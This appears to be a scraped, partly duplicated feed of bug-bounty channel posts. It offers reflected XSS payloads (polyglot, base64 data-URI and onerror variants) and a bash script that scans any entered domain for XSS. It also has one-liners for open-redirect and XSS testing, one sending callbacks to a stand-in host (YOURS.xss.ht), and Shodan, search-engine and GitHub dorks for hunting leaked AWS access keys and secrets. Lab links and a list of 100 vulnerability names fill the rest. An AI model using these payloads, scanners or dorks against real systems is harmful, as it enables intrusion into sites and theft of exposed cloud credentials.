Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
β€6π₯3β€βπ₯1π1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
π₯°7π₯3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
π₯6β€2
π¨Toxicacheπ¨
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
πGolang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
πhttps://lnkd.in/gdtpJGmT
β‘5β€3π₯2π1π1
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy https://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
π Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
π10π₯5
Useful XSS payloads:
"/*\"/*`/*' /*</template> </textarea></noembed></noscript></title> </style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTIGJ5IFZpY2tpZScpPC9zY3JpcHQ+"
data:text/html,<script>alert(1)</script>
<select><noembed></select><script x='a@b'a>
β€11π4π1π₯1
Cyber Security Lab Practice, RED & BLUE Team.
πAttack-Defense - https://attackdefense.com
πAlert to win - https://aalf.nu/alert1
πBancocn - https://bancocn.com
πBuffer Overflow Labs - https://lnkd.in/eNbEWYh
πCTF Komodo Security - https://ctf.komodosec.com
πCryptoHack - https://cryptohack.org/
πCMD Challenge - https://cmdchallenge.com
πExplotation Education - https://exploit.education
πGoogle CTF - https://lnkd.in/e46drbz8
πHackTheBox - Dr. AITH - https://www.hackthebox.com
πHackthis - https://www.hackthis.co.uk
πHacksplaining - https://lnkd.in/eAB5CSTA
πHacker101 - https://ctf.hacker101.com
πCapture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πHacking-Lab - https://hacking-lab.com/
πImmersiveLabs - https://immersivelabs.com
πNewbieContest - https://lnkd.in/ewBk6fU5
πOverTheWire - https://overthewire.org
πPractical Pentest Labs - https://lnkd.in/esq9Yuv5
πPentestlab - https://pentesterlab.com
πPenetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πPentestIT LAB - https://lab.pentestit.ru
πPicoCTF - https://picoctf.com
πPWNABLE - https://lnkd.in/eMEwBJzn
πRoot-Me - https://www.root-me.org
πRoot in Jail - https://rootinjail.com
πSANS Challenger - https://lnkd.in/e5TAMawK
πSmashTheStack - https://lnkd.in/eVn9rP9p
πThe Cryptopals Crypto Challenges - https://cryptopals.com
πTry Hack Me - https://tryhackme.com
πVulnhub - https://www.vulnhub.com
πVulnmachine - https://lnkd.in/eJ2e_kD
πW3Challs - https://w3challs.com
πWeChall - https://www.wechall.net
πWebsploit - https://websploit.org/
πZenk-Security - https://lnkd.in/ewJ5rNx2
πCyberdefenders - https://lnkd.in/dVcmjEw8
πLetsDefend- https://letsdefend.io/
πAttack-Defense - https://attackdefense.com
πAlert to win - https://aalf.nu/alert1
πBancocn - https://bancocn.com
πBuffer Overflow Labs - https://lnkd.in/eNbEWYh
πCTF Komodo Security - https://ctf.komodosec.com
πCryptoHack - https://cryptohack.org/
πCMD Challenge - https://cmdchallenge.com
πExplotation Education - https://exploit.education
πGoogle CTF - https://lnkd.in/e46drbz8
πHackTheBox - Dr. AITH - https://www.hackthebox.com
πHackthis - https://www.hackthis.co.uk
πHacksplaining - https://lnkd.in/eAB5CSTA
πHacker101 - https://ctf.hacker101.com
πCapture The Flag - Hacker Security - https://lnkd.in/ex7R-C-e
πHacking-Lab - https://hacking-lab.com/
πImmersiveLabs - https://immersivelabs.com
πNewbieContest - https://lnkd.in/ewBk6fU5
πOverTheWire - https://overthewire.org
πPractical Pentest Labs - https://lnkd.in/esq9Yuv5
πPentestlab - https://pentesterlab.com
πPenetration Testing Practice Labs - https://lnkd.in/e6wVANYd
πPentestIT LAB - https://lab.pentestit.ru
πPicoCTF - https://picoctf.com
πPWNABLE - https://lnkd.in/eMEwBJzn
πRoot-Me - https://www.root-me.org
πRoot in Jail - https://rootinjail.com
πSANS Challenger - https://lnkd.in/e5TAMawK
πSmashTheStack - https://lnkd.in/eVn9rP9p
πThe Cryptopals Crypto Challenges - https://cryptopals.com
πTry Hack Me - https://tryhackme.com
πVulnhub - https://www.vulnhub.com
πVulnmachine - https://lnkd.in/eJ2e_kD
πW3Challs - https://w3challs.com
πWeChall - https://www.wechall.net
πWebsploit - https://websploit.org/
πZenk-Security - https://lnkd.in/ewJ5rNx2
πCyberdefenders - https://lnkd.in/dVcmjEw8
πLetsDefend- https://letsdefend.io/
β€8π2π₯1
AWS OSINT by Dorking
=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
title:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
title:"EC2 Instance Information"
http.title:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
title:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"
=Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:https://s3.amazonaws.com intitle:index.of.bucket ββ
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
=Shodan Dorks
html:"AWS_ACCESS_KEY_ID"
html:"AWS_SECRET_ACCESS_KEY"
html:"AWS_SESSION_TOKEN"
title:"AWS S3 Explorer"
html:"AWS Elastic Beanstalk overview"
html:"OpenSearch Dashboards"
"X-Amz-Server-Side-Encryption"
title:"EC2 Instance Information"
http.title:"Amazon Cognito Developer Authentication Sample"
"Server: EC2ws"
title:"AWS X-Ray Sample Application"
html:"Amazon EC2 Status"
html:"AWS EC2 Auto Scaling Lab"
html:"istBucketResult"
=Search Engine Dorks
site:.s3.amazonaws.com "Company"
site:https://s3.amazonaws.com intitle:index.of.bucket ββ
site:s3.amazonaws.com "index of /" s3
site:amazonaws.com filetype:xls password
inurl:gitlab "AWS_SECRET_KEY"
inurl:pastebin "AWS_ACCESS_KEY"
inurl:s3.amazonaws.com intitle:"AWS S3 Explorer"
=Github Dorks
Key:amazon_secret_access_key
amazonaws
aws_access
aws_access_key_id
aws_bucket aws_key
aws_secret
aws_secret_key
aws_token
bucket_password
bucketeer_aws_access_key_id
bucketeer_aws_secret_access_key
cache_s3_secret_key
cloud_watch_aws_access_key
filename:credentials
aws_access_key_id
filename:s3cfg
lottie_s3_api_key
lottie_s3_secret_key
rds.amazonaws.com password
s3_access_key
s3_access_key_id
s3_key s3_key_app_logs
s3_key_assets
s3_secret_key
sandbox_aws_access_key_id
sandbox_aws_secret_access_key
secret_key
eureka.aws
secretkey
filename:.bash_profile
aws
filename:.s3cfg
π₯7π3
π₯ 100 Web Vulnerabilities, categorized into various types : π
β‘ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
β‘ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
β‘ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
β‘ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
β‘ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
β‘ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
β‘ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
β‘ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
β‘ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
β‘ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
β‘ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
β‘ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
β‘ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
β‘ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
β‘ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
β‘ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
β‘ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF
β‘ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
β‘ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
β‘ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
β‘ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
β‘ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
β‘ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
β‘ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
β‘ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
β‘ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
β‘ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
β‘ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
β‘ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
β‘ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
β‘ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
β‘ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
β‘ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
β‘ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
β‘ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
β‘ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass
β‘ Server-Side Request Forgery (SSRF):
87. Blind SSR
88. Time-Based Blind SSRF
β‘ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass
β‘ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws
β‘ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits
π19β€βπ₯4β€2